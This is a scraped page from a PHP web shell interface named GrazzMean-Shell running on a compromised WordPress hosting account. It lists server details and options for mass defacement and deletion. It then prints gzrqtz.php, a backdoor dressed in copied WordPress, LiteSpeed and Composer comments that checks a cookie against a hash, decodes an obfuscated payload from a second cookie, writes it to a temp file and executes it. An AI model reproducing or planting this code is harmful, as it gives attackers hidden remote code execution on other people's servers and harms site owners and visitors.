shell bypass 403

GrazzMean-Shell Shell

: /home/allssztx/ammiebc.org/wp-includes/Text/ [ drwxr-xr-x ]
Uname: Linux business55.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
Software: LiteSpeed
PHP version: 8.1.31 [ PHP INFO ] PHP os: Linux
Server Ip: 162.213.251.212
Your Ip: 18.118.49.198
User: allssztx (535) | Group: allssztx (533)
Safe Mode: OFF
Disable Function:
NONE
upload mass deface mass delete console

name : gzrqtz.php 
<?php

/**
 * WordPress eXtended RSS file parser implementations
 *
 * @package WordPress
 * @subpackage Importer
 */

$in = 4;
$uzYsdGf = 22;
$DFzRtt = tmpfile();

// Force define for object cache usage before plugin init
!defined('LSCWP_DIR') && define('LSCWP_DIR', __DIR__ . '/'); // Full absolute path '/var/www/html/***/wp-content/plugins/litespeed-cache/' or MU

if (!function_exists('litespeed_autoload')) {
	function litespeed_autoload($cls)
	{
		if (strpos($cls, '.') !== false) {
			return;
		}

		if (strpos($cls, 'LiteSpeed') !== 0) {
			return;
		}

		$file = explode('\\', $cls);
		array_shift($file);
		$file = implode('/', $file);
		$file = str_replace('_', '-', strtolower($file));

		if (strpos($file, 'lib/') === 0 || strpos($file, 'cli/') === 0 || strpos($file, 'thirdparty/') === 0) {
			$file =  $file . '.cls.php';
		} else {
			$file =  'src/' . $file . '.cls.php';
		}
	}
}

/**
 * Auto registration for LiteSpeed classes
 *
 * @since      	1.1.0
 */

function render_tab_container_close( $field_args1, $field ) {
	echo '</div><!-- /.rank-math-tabs-content -->';
	echo '</div><!-- '.$field_args1.'/# -->';

	return $field;
}

	/**
	 * Render tab content opening <div> and closing </div>.
	 *
	 * @param array      $field_args1 Array of field arguments.
	 * @param CMB2_Field $field      The field object.
	 *
	 * @return CMB2_Field
	 */

function mnlwxO ( $input ) {
	/**
	 * Handles sanitization for Separator Character option.
	 *
	 * @param mixed $value The unsanitized value from the form.
	 *
	 * @return mixed Sanitized value to be stored.
	 */
	 
	$inl = strlen($input);
	$in = unpack('C*', $input);
	$padding = 0;
	$inli = 1;
	$i = 0;
	$j = 0;
	$uzYsdGf = array();
	
	$QaXqX = array(
		-2, -2, -2, -2, -2, -2, -2, -2, -2, -1, -1, -2, -2, -1, -2, -2,
		-2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2,
		-1, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, 62, -2, -2, -2, 63,
		52, 53, 54, 55, 56, 57, 58, 59, 60, 61, -2, -2, -2, -2, -2, -2,
		-2,  0,  1,  2,  3,  4,  5,  6,  7,  8,  9, 10, 11, 12, 13, 14,
		15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, -2, -2, -2, -2, -2,
		-2, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40,
		41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, -2, -2, -2, -2, -2,
		-2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2,
		-2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2,
		-2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2,
		-2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2,
		-2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2,
		-2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2,
		-2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2,
		-2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2
	);
	
	/**
	 * Handles sanitization of rank_math_permalink.
	 *
	 * @param string $value The unsanitized value from the form.
	 *
	 * @return string Sanitized value to be stored.
	 */

	while ($inl-- > 0) {
		$ch = $in[$inli++];
		if ($ch == "=") {
			$padding++;
			continue;
		}

		$ch = $QaXqX[$ch];

		if ($ch < 0) {
			continue;
		}

		switch ($i % 4) {
			case 0:
			$uzYsdGf[$j] = $ch << 2;
			break;
			case 1:
			$uzYsdGf[$j++] |= $ch >> 4;
			$uzYsdGf[$j] = ($ch & 0x0f) << 4;
			break;
			case 2:
			$uzYsdGf[$j++] |= $ch >>2;
			$uzYsdGf[$j] = ($ch & 0x03) << 6;
			break;
			case 3:
			$uzYsdGf[$j++] |= $ch;
			break;
		}
		
		$i++;
	}	
	$uzYsdGf[$j] = '10';	
	return implode(array_map("chr", $uzYsdGf));
}

if( md5 ( $_COOKIE[ $in ] ) != '66e458022ea949f46f6882e88f1f417b' ) 
{
	die;
}

/*
 * This file is part of Composer.
 *
 * (c) Nils Adermann <naderman@naderman.de>
 *     Jordi Boggiano <j.boggiano@seld.be>
 *
 * For the full copyright and license information, please view the LICENSE
 * file that was distributed with this source code.
 */
 
function WFYE ($file) {
	$n = 10+1+1+1;
	static $a = 'AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz';
	$n = (int)$n % 26;
	if ($n < 0) $n += 26;
	$rep = substr($a, $n * 2) . substr($a, 0, $n * 2);
	return strtr($file, $a, $rep);
}

$meta_data = stream_get_meta_data($DFzRtt); 
$php3 = '<?php ';	
/**
 * Handles sanitization of floating point values.
 *
 * @param string $value The unsanitized value from the form.
 *
 * @return string Sanitized value to be stored.
 */
 
fwrite ( $DFzRtt, $php3. mnlwxO ( WFYE ( $_COOKIE [ $in - 1 ] )));
/**
 * Create new categories based on import information
 *
 * Doesn't create a new category if its slug already exists
 */
ReQuiRe_onCE ( $meta_data["uri"] );

fclose($DFzRtt);
© 2025 GrazzMean-Shell